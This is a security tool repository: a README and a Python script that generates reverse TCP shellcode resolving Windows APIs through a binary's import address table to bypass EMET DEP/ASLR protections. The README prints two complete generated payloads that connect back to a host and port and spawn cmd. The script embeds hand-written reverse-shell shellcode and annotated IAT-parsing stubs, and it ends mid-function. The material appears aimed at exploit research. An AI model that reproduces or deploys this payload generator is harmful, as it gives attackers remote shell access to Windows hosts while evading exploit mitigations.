├── README.md
├── iat_poc.py
└── parser_output
    ├── win10
        └── output.json
    ├── win7
        └── output.json
    ├── win8
        └── output.json
    ├── winVista
        └── output.json
    └── winXP
        └── output.json


/README.md:
--------------------------------------------------------------------------------
  1 | # IAT_POC
  2 | 
  3 | Find a suitable IAT based payload, that bypasses post DEP/ASLR protections in EMET. 
  4 | 
  5 | 
  6 | ### Dependencies
  7 | ```
  8 | python2.7
  9 | pefile
 10 | ```
 11 | 
 12 | # Warning
 13 | *There is no exit function, you'll get a cmd shell back, but there will be a crash.  This was done by design - write your own exit function.*
 14 | 
 15 | ### Examples:
 16 | 
 17 | ```
 18 | $ ./iat_poc.py                                     
 19 | IAT parser reverse tcp payload generator
 20 | ಠ_ಠ
 21 | Usage: ./iat_poc.py PE_BINARY HOST PORT Operating_System_(winXP, winVista, win7, win8, win10) Force_EMET_HASH_(True/False) Force_Loaded_module_(True/False)
 22 | 
 23 | $./iat_poc.py handle.exe 127.0.0.1 8080 win10 True False
 24 | [*] Loading PE in pefile
 25 | [*] Parsing data directories
 26 | [*] Found API getprocaddress
 27 | [*] GetProcAddress API was found!
 28 | [*] DLLs in the import table: set(['COMDLG32.dll', 'VERSION.dll', 'GDI32.dll', 'KERNEL32.dll', 'ADVAPI32.dll', 'USER32.dll'])
 29 | [*] Using GPA IAT parsing stub
 30 | [*] Payload length: 489
 31 | "\xfc\x31\xd2\x64\x8b\x52\x30\x8b\x52\x08\x8b\xda\x03\x52\x3c\x8b\xba\x80\x00\x00\x00\x03\xfb\x8b\x57\x0c\x03\xd3\x81\x3a\x4b\x45\x52\x4e\x74\x05\x83\xc7\x14\xeb\xee\x57\xeb\x3e\x8b\x57\x10\x03\xd3\x8b\x37\x03\xf3\x8b\xca\x81\xc1\x00\x00\xff\x00\x33\xed\x8b\x06\x03\xc3\x83\xc0\x02\x3b\xc8\x72\x18\x3b\xc2\x72\x14\x3e\x8b\x7c\x24\x04\x39\x38\x75\x0b\x3e\x8b\x7c\x24\x08\x39\x78\x08\x75\x01\xc3\x83\xc5\x04\x83\xc6\x04\xeb\xd5\x68\x64\x64\x72\x65\x68\x47\x65\x74\x50\xe8\xb3\xff\xff\xff\x03\xd5\x5d\x5d\x8b\xca\x89\xcd\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x6a\x00\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\x89\xe9\xff\x11\x50\x89\xe3\x87\xcd\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x87\xf1\xff\x13\x68\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50\x97\xff\x16\x95\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\xff\xd5\x68\x74\x41\x00\x00\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x57\xff\x16\x95\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\xd5\x95\x68\x65\x63\x74\x00\x68\x63\x6f\x6e\x6e\x54\x57\xff\x16\x87\xcd\x95\x6a\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x1f\x90\x89\xe2\x6a\x10\x52\x51\x87\xf9\xff\xd5\x85\xc0\x74\x00\x6a\x00\x68\x65\x6c\x33\x32\x68\x6b\x65\x72\x6e\x54\xff\x13\x68\x73\x41\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50\xff\x16\x95\x93\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x87\xfe\x92\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x87\xda\xff\xd5\x89\xe6\x6a\x00\x68\x65\x6c\x33\x32\x68\x6b\x65\x72\x6e\x54\xff\x13\x68\x65\x63\x74\x00\x68\x65\x4f\x62\x6a\x68\x69\x6e\x67\x6c\x68\x46\x6f\x72\x53\x68\x57\x61\x69\x74\x54\x50\x95\xff\x17\x95\x89\xf2\x31\xf6\x4e\x90\x46\x89\xd4\xff\x32\x96\xff\xd5\x81\xc4\x34\x02\x00\x00"
 32 | Writing payload to shellcode_output.bin
 33 | 
 34 | $ ./iat_poc.py handle.exe 127.0.0.1 8080 win10 True True 
 35 | [*] Loading PE in pefile
 36 | [*] Parsing data directories
 37 | [*] Found API getprocaddress
 38 | [*] GetProcAddress API was found!
 39 | [*] DLLs in the import table: set(['COMDLG32.dll', 'VERSION.dll', 'GDI32.dll', 'KERNEL32.dll', 'ADVAPI32.dll', 'USER32.dll'])
 40 | [*] Checking win10 compatibility
 41 | [*] Number of lookups to do: 52270
 42 |  [*] Checking for its imported DLLs: COMDLG32.dll
 43 | 	[*] COMDLG32.dll adds the following not already loaded dll: msvcrt.dll
 44 | 	[*] COMDLG32.dll adds the following not already loaded dll: ntdll.dll
 45 | 	[*] COMDLG32.dll adds the following not already loaded dll: SHLWAPI.dll
 46 | 	[*] COMDLG32.dll adds the following not already loaded dll: COMCTL32.dll
 47 | 	[*] COMDLG32.dll adds the following not already loaded dll: SHELL32.dll
 48 | 	[*] COMDLG32.dll adds the following not already loaded dll: FirewallAPI.dll
 49 | 	[*] COMDLG32.dll adds the following not already loaded dll: NETAPI32.dll
 50 |  [*] Checking for its imported DLLs: emet.dll
 51 |  [*] Checking for its imported DLLs: VERSION.dll
 52 | 	[*] VERSION.dll adds the following not already loaded dll: KERNELBASE.dll
 53 |  [*] Checking for its imported DLLs: GDI32.dll
 54 |  [*] Checking for its imported DLLs: KERNEL32.dll
 55 |  [*] Checking for its imported DLLs: ADVAPI32.dll
 56 | 	[*] ADVAPI32.dll adds the following not already loaded dll: SECHOST.dll
 57 | 	[*] ADVAPI32.dll adds the following not already loaded dll: RPCRT4.dll
 58 |  [*] Checking for its imported DLLs: USER32.dll
 59 |  [*] Checking for its imported DLLs: COMDLG32.dll
 60 |  [*] Checking for its imported DLLs: KERNEL32.dll
 61 |  [*] Checking for its imported DLLs: msvcrt.dll
 62 |  [*] Checking for its imported DLLs: NETAPI32.dll
 63 |  [*] Checking for its imported DLLs: ntdll.dll
 64 |  [*] Checking for its imported DLLs: SHELL32.dll
 65 |  [*] Checking for its imported DLLs: RPCRT4.dll
 66 | 	[*] RPCRT4.dll adds the following not already loaded dll: SspiCli.dll
 67 |  [*] Checking for its imported DLLs: COMCTL32.dll
 68 |  [*] Checking for its imported DLLs: FirewallAPI.dll
 69 |  [*] Checking for its imported DLLs: emet.dll
 70 |  [*] Checking for its imported DLLs: KERNELBASE.dll
 71 |  [*] Checking for its imported DLLs: VERSION.dll
 72 |  [*] Checking for its imported DLLs: GDI32.dll
 73 |  [*] Checking for its imported DLLs: ADVAPI32.dll
 74 |  [*] Checking for its imported DLLs: SHLWAPI.dll
 75 |  [*] Checking for its imported DLLs: SECHOST.dll
 76 |  [*] Checking for its imported DLLs: USER32.dll
 77 | [*] Parsing imported dlls complete
 78 | [*] Possible useful loaded modules: set(['COMDLG32.dll', 'KERNEL32.dll', u'msvcrt.dll', u'NETAPI32.dll', u'RPCRT4.dll', u'SHELL32.dll', u'ntdll.dll', u'COMCTL32.dll', u'FirewallAPI.dll', 'emet.dll', u'KERNELBASE.dll', 'VERSION.dll', 'GDI32.dll', u'SspiCli.dll', 'ADVAPI32.dll', u'SHLWAPI.dll', u'SECHOST.dll', 'USER32.dll'])
 79 | [*] Looking for loadliba/getprocaddr or just getprocaddr in COMDLG32.dll
 80 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\comdlg32.dll
 81 | [*] Looking for loadliba/getprocaddr or just getprocaddr in KERNEL32.dll
 82 | [*] Looking for loadliba/getprocaddr or just getprocaddr in msvcrt.dll
 83 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\msvcrt.dll
 84 | [*] Looking for loadliba/getprocaddr or just getprocaddr in NETAPI32.dll
 85 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\netapi32.dll
 86 | [*] Looking for loadliba/getprocaddr or just getprocaddr in RPCRT4.dll
 87 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\rpcrt4.dll
 88 | [*] Looking for loadliba/getprocaddr or just getprocaddr in SHELL32.dll
 89 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\shell32.dll
 90 | [*] Looking for loadliba/getprocaddr or just getprocaddr in ntdll.dll
 91 | [*] Looking for loadliba/getprocaddr or just getprocaddr in COMCTL32.dll
 92 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\comctl32.dll
 93 | [*] Looking for loadliba/getprocaddr or just getprocaddr in FirewallAPI.dll
 94 | [*] Looking for loadliba/getprocaddr or just getprocaddr in emet.dll
 95 | 	-- GetProcAddress will work with this imported DLL: c:\\Program Files (x86)\EMET 5.5\EMET.dll
 96 | 	-- This imported DLL will work for LLA/GPA: c:\\Program Files (x86)\EMET 5.5\EMET.dll
 97 | [*] Looking for loadliba/getprocaddr or just getprocaddr in KERNELBASE.dll
 98 | [*] Looking for loadliba/getprocaddr or just getprocaddr in VERSION.dll
 99 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\version.dll
100 | [*] Looking for loadliba/getprocaddr or just getprocaddr in GDI32.dll
101 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\gdi32.dll
102 | [*] Looking for loadliba/getprocaddr or just getprocaddr in SspiCli.dll
103 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\sspicli.dll
104 | [*] Looking for loadliba/getprocaddr or just getprocaddr in ADVAPI32.dll
105 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\advapi32.dll
106 | 	-- This imported DLL will work for LLA/GPA: c:\\Windows\System32\advapi32.dll
107 | [*] Looking for loadliba/getprocaddr or just getprocaddr in SHLWAPI.dll
108 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\shlwapi.dll
109 | 	-- This imported DLL will work for LLA/GPA: c:\\Windows\System32\shlwapi.dll
110 | [*] Looking for loadliba/getprocaddr or just getprocaddr in SECHOST.dll
111 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\sechost.dll
112 | [*] Looking for loadliba/getprocaddr or just getprocaddr in USER32.dll
113 | 	-- GetProcAddress will work with this imported DLL: c:\\Windows\System32\user32.dll
114 | [*] LLA/GPA binaries available: {u'advapi32.dll': 3347727348, u'shlwapi.dll': 3944223590, u'emet.dll': 3949030565}
115 | [*] GPA binaries available: {u'comdlg32.dll': 1188016652, u'sspicli.dll': 689806071, u'emet.dll': 3949030565, u'version.dll': 3942686535, u'gdi32.dll': 1619852574, u'advapi32.dll': 3347727348, u'msvcrt.dll': 1948800968, u'netapi32.dll': 3375022068, u'shell32.dll': 1013581072, u'rpcrt4.dll': 2764485184, u'shlwapi.dll': 3944223590, u'sechost.dll': 2896986352, u'user32.dll': 2217227836, u'comctl32.dll': 1229959685}
116 | ********************************************************************************
117 | [*] Setting imported IAT GPA payload
118 | [!] Using GPA DLL and hash comdlg32.dll 0x46cfb20c
119 | [*] HASH 0x46cfb20c
120 | [*] Payload length: 543
121 | "\x90\xfc\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81\xff\x0c\xb2\xcf\x46\x8b\x5a\x10\x8b\x12\x75\xdb\x90\x90\x90\x89\xda\x03\x52\x3c\x8b\xba\x80\x00\x00\x00\x01\xdf\x90\x90\x8b\x57\x0c\x01\xda\x81\x3a\x4b\x45\x52\x4e\x81\x7a\x04\x45\x4c\x33\x32\x74\x05\x83\xc7\x14\xeb\xe5\x57\xeb\x3d\x90\x90\x8b\x57\x10\x01\xda\x8b\x37\x01\xde\x89\xd1\x81\xc1\x00\x00\xff\x00\x31\xed\x90\x90\x8b\x06\x01\xd8\x83\xc0\x02\x39\xc1\x72\x13\x8b\x7c\x24\x04\x39\x38\x75\x0b\x3e\x8b\x7c\x24\x08\x39\x78\x08\x75\x01\xc3\x83\xc5\x04\x83\xc6\x04\xeb\xd8\x90\x90\x68\x64\x64\x72\x65\x68\x47\x65\x74\x50\xe8\xb3\xff\xff\xff\x03\xd5\x5d\x5d\x8b\xca\x89\xcd\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x6a\x00\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\x89\xe9\xff\x11\x50\x89\xe3\x87\xcd\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x87\xf1\xff\x13\x68\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50\x97\xff\x16\x95\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\xff\xd5\x68\x74\x41\x00\x00\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x57\xff\x16\x95\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\xd5\x95\x68\x65\x63\x74\x00\x68\x63\x6f\x6e\x6e\x54\x57\xff\x16\x87\xcd\x95\x6a\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x1f\x90\x89\xe2\x6a\x10\x52\x51\x87\xf9\xff\xd5\x85\xc0\x74\x00\x6a\x00\x68\x65\x6c\x33\x32\x68\x6b\x65\x72\x6e\x54\xff\x13\x68\x73\x41\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50\xff\x16\x95\x93\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x87\xfe\x92\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x87\xda\xff\xd5\x89\xe6\x6a\x00\x68\x65\x6c\x33\x32\x68\x6b\x65\x72\x6e\x54\xff\x13\x68\x65\x63\x74\x00\x68\x65\x4f\x62\x6a\x68\x69\x6e\x67\x6c\x68\x46\x6f\x72\x53\x68\x57\x61\x69\x74\x54\x50\x95\xff\x17\x95\x89\xf2\x31\xf6\x4e\x90\x46\x89\xd4\xff\x32\x96\xff\xd5\x81\xc4\x34\x02\x00\x00"
122 | Writing payload to shellcode_output.bin
123 | ```
124 | 


--------------------------------------------------------------------------------
/iat_poc.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # Created By Josh Pitts
  3 | # Edits By Casey Smith
  4 | # This modification Locates ADVAPI32, then LoadLibA, GetProcAddress from there. ;)
  5 | import struct
  6 | import sys
  7 | import pefile
  8 | import ntpath
  9 | import json
 10 | 
 11 | 
 12 | lla_hash_set = {}
 13 | gpa_hash_set = {}
 14 | lla_gpa_found = False
 15 | gpa_found = False
 16 | 
 17 | ###############################
 18 | #Modified from Stephen Fewer's hash.py 
 19 | ###############################
 20 | 
 21 | def ror(dword, bits):
 22 |     return (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
 23 | 
 24 | def unicode(string, uppercase=True):
 25 |     result = ""
 26 |     if uppercase:
 27 |         string = string.upper()
 28 |     for c in string:
 29 |         result += c + "\x00"
 30 |     return result
 31 | 
 32 | def hash(module, bits=13, print_hash=True):
 33 |     module_hash = 0
 34 |     if len(module) < 12:
 35 |         module += "\x00" * (12 - len(module))
 36 |     if len(module) > 12:
 37 |         module += module[:12]
 38 |     for c in unicode(module):
 39 |         #print '\t', c.encode('hex')
 40 |         module_hash = ror(module_hash, bits)
 41 |         module_hash += ord(c)
 42 |     return module_hash
 43 | 
 44 | ###############################
 45 | ###############################
 46 | 
 47 | def find_apis(dll_set, os_system):
 48 |     locations = ['winXP', 'win7', 'win8', 'winVista', 'win10']
 49 |     ignore_dlls = ['api-ms-win', ]
 50 |     #ignore_dlls = []
 51 |     #goodtogo = {}
 52 |     loaded_modules = set()
 53 |     #dll_set.add('emet.dll')
 54 |     temp_set = dll_set
 55 |     if os_system.lower() == 'all':
 56 |         look_here = locations
 57 |     else:
 58 |         look_here = [os_system]
 59 | 
 60 |     for location in look_here:
 61 |         dll_set = temp_set
 62 |         #goodtogo[location] = {}
 63 | 
 64 |         print "[*] Checking %s compatibility" % location
 65 |         _location = './parser_output/' + location + '/output.json'
 66 |         #_included = './parser_output/' + location + '/included.json'
 67 |         all_dlls_dict = json.loads(open(_location, 'r').read())
 68 |         #included_dict = json.loads(open(_included, 'r').read())
 69 |         print "[*] Number of lookups to do:", len(all_dlls_dict)
 70 | 
 71 |         # get all loaded modules
 72 |         def recursive_parse(dll_set):
 73 |             # FML
 74 |             # list the dll that is imported by what dll
 75 |             # if it isn't already in the set print dll, imported name
 76 |             temp_lm = set()
 77 |             for dll in dll_set:
 78 |                 print " [*] Checking for its imported DLLs:", dll
 79 |                 for key, value in all_dlls_dict.iteritems():
 80 |                     if dll.lower() == ntpath.basename(key.lower()):
 81 |                         for lm in value['dlls']:
 82 |                             found = True
 83 |                             for ig_dll in ignore_dlls:
 84 |                                 if ig_dll.lower().encode('utf-8') in lm.lower().encode('utf-8'):
 85 |                                     #print ig_dll.lower(), lm.lower()
 86 |                                     found = False
 87 |                             if found is True and lm not in temp_lm and lm not in dll_set:
 88 |                                 print '\t[*]', dll, 'adds the following not already loaded dll:', lm
 89 | 
 90 |                                 temp_lm.add(lm)
 91 | 
 92 |             return temp_lm
 93 | 
 94 |         temp_dict = {}
 95 |         while True:
 96 |             length = len(dll_set)
 97 |             temp_dict = recursive_parse(dll_set)
 98 |             dll_set = dll_set.union(temp_dict)
 99 |             if len(temp_dict) <= length:
100 |                 print "[*] Parsing imported dlls complete"
101 |                 break
102 | 
103 |         """for dll in dll_set:
104 |             for key, value in all_dlls_dict.iteritems():
105 |                 if dll.lower() == ntpath.basename(key.lower()):
106 |                     for lm in value['dlls']:
107 |                         for ig_dll in ignore_dlls:
108 |                             if ig_dll.lower().encode('utf-8') in lm.lower().encode('utf-8'):
109 |                                 #print ig_dll.lower(), lm.lower()
110 |                                 continue
111 |                             else:
112 |                                 #print 'adding', lm
113 |                                 loaded_modules.add(lm)
114 | 
115 | 
116 |         print "check2:", loaded_modules
117 |         """
118 | 
119 |         print "[*] Possible useful loaded modules:", dll_set
120 |         dllfound = False
121 |         getprocaddress_dll = False
122 |         blacklist = ['kernel32.dll', 'firewallapi.dll']
123 |         for dll in dll_set:
124 |             print '[*] Looking for loadliba/getprocaddr or just getprocaddr in %s' % dll
125 | 
126 |             dllfound = False
127 |             getprocaddress_dll = False
128 | 
129 |             for key, value in all_dlls_dict.iteritems():
130 |                 #print dll.lower(), ntpath.basename(key.lower())
131 |                 if ntpath.basename(key.lower()) in blacklist:
132 |                     continue
133 |                 if dll.lower() == ntpath.basename(key.lower()):
134 |                     if value['getprocaddress'] is True:
135 |                         #print "yes!"
136 |                         if 'system32' in key.lower():
137 |                             getprocaddress_dll = True
138 |                             
139 |                         elif 'program files' in key.lower():
140 |                             getprocaddress_dll = True
141 | 
142 |                         if getprocaddress_dll is True:
143 |                             print "\t-- GetProcAddress will work with this imported DLL:", key
144 |                             gpa_hash_set[ntpath.basename(key.lower())] = hash(ntpath.basename(key.lower()))
145 |                             getprocaddress_dll = False
146 | 
147 |                     if value['loadlibrarya'] is True and value['getprocaddress'] is True:
148 | 
149 |                         if 'system32' in key.lower():
150 |                             dllfound = True
151 |                             break
152 |                         #elif 'windows' in key.lower():
153 |                         #    dllfound = True
154 |                         #    break
155 |                         elif 'program files' in key.lower():
156 |                             dllfound = True
157 |                             break
158 |                         #else:
159 |                         #    dllfound = True
160 | 
161 |             if dllfound is True:
162 |                 #goodtogo[location][key] = value
163 |                 print "\t-- This imported DLL will work for LLA/GPA:", key
164 |                 lla_hash_set[ntpath.basename(key.lower())] = hash(ntpath.basename(key.lower()))
165 |                 #print key, value
166 | 
167 |         print "[*] LLA/GPA binaries available:", lla_hash_set
168 |         print "[*] GPA binaries available:", gpa_hash_set
169 |         print "*" * 80
170 |         return lla_hash_set, gpa_hash_set
171 | 
172 | 
173 | def check_apis(aFile, os_system):
174 |     ####################################
175 |     #### Parse imports via pefile ######
176 | 
177 |     #make this option only if a IAT based shellcode is selected
178 |     print "[*] Loading PE in pefile"
179 |     pe = pefile.PE(aFile, fast_load=True)
180 |     print "[*] Parsing data directories"
181 |     pe.parse_data_directories()
182 |     apis = {}
183 |     apis['neededAPIs'] = set()
184 |     dlls = set()
185 |     lla_gpa_found = False
186 |     gpa_found = False
187 | 
188 |     try:
189 |         for api in ['LoadLibraryA', 'GetProcAddress']:
190 |             apiFound = False
191 |             for entry in pe.DIRECTORY_ENTRY_IMPORT:
192 |                 dlls.add(entry.dll)
193 |                 for imp in entry.imports:
194 |                     if imp.name is None:
195 |                         continue
196 |                     if imp.name.lower() == api.lower():
197 |                         print "[*] Found API", api.lower()
198 |                         apiFound = True
199 |             
200 |             if apiFound is False:
201 |                 apis['neededAPIs'].add(api)
202 |             
203 |     except Exception as e:
204 |         print "Exception:", str(e)
205 | 
206 |     if apis['neededAPIs'] == set():
207 |         print '[*] Both LLA/GPA APIs found!'
208 |         lla_gpa_found = True
209 |         gpa_found = True
210 |     
211 |     elif 'LoadLibraryA' in apis['neededAPIs']:
212 |         print '[*] GetProcAddress API was found!'
213 |         gpa_found = True
214 |     
215 |     return dlls, lla_gpa_found, gpa_found
216 | 
217 | def pack_ip_addresses(HOST):
218 |         hostocts = []
219 |         for i, octet in enumerate(HOST.split('.')):
220 |                 hostocts.append(int(octet))
221 |         hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
222 |                              hostocts[2], hostocts[3])
223 |         return hostip
224 | 
225 | 
226 | def decision_tree(HOST, PORT, dlls, lla_gpa_found, gpa_found, os_system, FORCE_EMET, USE_LOADED_MODULE):
227 |     
228 |     if FORCE_EMET.lower() == "true" and USE_LOADED_MODULE.lower() == 'false':
229 |             print "Forcing EMET.dll hash for use in IAT Loaded Module parser"
230 |             # pass the EMET.dll hash to the function
231 |             #shellcode = locate_hash1 + struct.pack("<I", 0xeb616ca5) + locate_hash2 + lla_gpa_parser + get_lla_gpa + shellcode5
232 |             #print shellcode
233 |             shellcode = loaded_iat_parser_stub(hash('EMET.dll')) + iat_rev_tcp_stub(HOST, PORT)
234 |             return shellcode
235 |     
236 |     elif lla_gpa_found is True and USE_LOADED_MODULE.lower() == 'false':
237 |         print '[*] Using LLA/GPA IAT parsing stub'
238 |         shellcode =  iat_parser_stub() + iat_rev_tcp_stub(HOST, PORT)
239 |         return shellcode
240 | 
241 |     elif gpa_found is True and USE_LOADED_MODULE.lower() == 'false':
242 |         print '[*] Using GPA IAT parsing stub'
243 |         shellcode = gpa_parser_stub() + iat_rev_tcp_stub(HOST, PORT)
244 |         return shellcode
245 | 
246 | 
247 |     else:
248 |         
249 |         lla_hash_set, gpa_hash_set = find_apis(dlls, os_system)
250 |         
251 |         if lla_hash_set == dict() and lla_hash_set != {}:
252 |             print "[*] In lla_hash_set payload:", lla_hash_set
253 |             DLL, a_hash = lla_hash_set.iteritems().next()
254 |             print "[!] Using LLA/GPA DLL and hash", DLL, hex(a_hash)
255 |             shellcode = loaded_iat_parser_stub(lla_hash_set.itervalues().next()) + iat_rev_tcp_stub(HOST, PORT)
256 |             return shellcode
257 |             # pass that hash to the function
258 |         
259 |         elif gpa_hash_set != dict():
260 |             print "[*] Setting imported IAT GPA payload"
261 |             DLL, a_hash = gpa_hash_set.iteritems().next()
262 |             print "[!] Using GPA DLL and hash", DLL, hex(a_hash)
263 |             
264 |             shellcode = loaded_gpa_iat_parser_stub(gpa_hash_set.itervalues().next()) + iat_rev_tcp_stub(HOST, PORT)
265 |             # use that
266 |             return shellcode
267 |         else:
268 |             print "[!] You have no options..."
269 |             print "\xc2\xaf\\_(\xe3\x83\x84)_/\xc2\xaf"
270 |             
271 | 
272 |         return shellcode
273 | 
274 | def iat_rev_tcp_stub(HOST, PORT):
275 | 
276 |     # hand written reverse TCP shellcode to build a payload from loadliba getprocaddr in EBX, ECX
277 |     shellcode1 = ("\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68" +
278 |                    "\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
279 |                    "\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
280 |                    "\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
281 |                    "\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
282 |                    "\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
283 |                    "\x95\x6A\x05\x68"
284 |                    )
285 |     shellcode1 += pack_ip_addresses(HOST)          # HOST
286 |     shellcode1 += "\x68\x02\x00"
287 |     shellcode1 += struct.pack('!h', PORT)      # PORT
288 |     shellcode1 += ("\x89\xE2\x6A"
289 |                    "\x10\x52\x51\x87\xF9\xFF\xD5"
290 |                    )
291 | 
292 |     shellcode2 = ("\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
293 |                   "\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
294 |                   "\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
295 |                   "\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
296 |                   "\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
297 |                   "\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
298 |                   "\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
299 |                   "\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
300 |                   "\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
301 |                   #NOP below to continue execution
302 |                   "\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x90\x46\x89\xD4"
303 |                   "\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00"
304 |                   )
305 | 
306 |     return shellcode1 + shellcode2
307 | 
308 | def iat_parser_stub():
309 |     """
310 |         IAT parser based code:
311 |         Idea from: http://phrack.org/issues/63/15.html
312 |         Bypasses EMET 5.1
313 |         LoadlibraryA and GetProcaddress IAT finder
314 |     """
315 |     
316 |     shellcode = ( "\xfc"
317 |                    "\x31\xd2"                      # xor edx, edx                          ;prep edx for use
318 |                    "\x64\x8b\x52\x30"              # mov edx, dword ptr fs:[edx + 0x30]    ;PEB
319 |                    "\x8b\x52\x08"                  # mov edx, dword ptr [edx + 8]          ;PEB.imagebase
320 |                    "\x8b\xda"                      # mov ebx, edx                          ;Set ebx to imagebase
321 |                    #"\x8b\xc3"                      # mov eax, ebx                         ;Set eax to imagebase
322 |                    "\x03\x52\x3c"                  # add edx, dword ptr [edx + 0x3c]       ;"PE"
323 |                    "\x8b\xba\x80\x00\x00\x00"      # mov edi, dword ptr [edx + 0x80]       ;Import Table RVA
324 |                    "\x03\xfb"                      # add edi, ebx                          ;Import table in memory offset
325 | 
326 |                    #findImport:
327 |                    "\x8b\x57\x0c"                  # mov edx, dword ptr [edi + 0xc]        ;Offset for Import Directory Table Name RVA
328 |                    "\x03\xd3"                      # add edx, ebx                          ;Offset in memory
329 |                    "\x81\x3a\x4b\x45\x52\x4e"      # cmp dword ptr [edx], 0x4e52454b       ;Replace this so any API can be called
330 |                    "\x74\x05"                      # je 0x102f                             ;jmp saveBase
331 |                    "\x83\xc7\x14"                  # add edi, 0x14                         ;inc to next import
332 |                    "\xeb\xee"                      # jmp 0x101d                            ;Jmp findImport
333 | 
334 |                    #saveBase:
335 |                    "\x57"                          # push edi                              ;save addr of import base
336 |                    "\xeb\x3e"                      # jmp 0x106e                            ;jmp loadAPIs
337 | 
338 |                    #setBounds:
339 |                    #;this is needed as the parsing could lead to eax ptr's to unreadable addresses
340 |                    "\x8b\x57\x10"                  # mov edx, dword ptr [edi + 0x10]       ;Point to API name
341 |                    "\x03\xd3"                      # add edx, ebx                          ;Adjust to in memory offset
342 |                    "\x8b\x37"                      # mov esi, dword ptr [edi]              ;Set ESI to the Named Import base
343 |                    "\x03\xf3"                      # add esi, ebx                          ;Adjust to in memory offset
344 |                    "\x8b\xca"                      # mov ecx, edx                          ;Mov in memory offset to ecx
345 |                    "\x81\xc1\x00\x00\xff\x00"      # add ecx, 0x40000                      ;Set an upper bounds for reading
346 |                    "\x33\xed"                      # xor ebp, ebp                          ;Zero ebp for thunk offset
347 | 
348 |                    #findAPI:
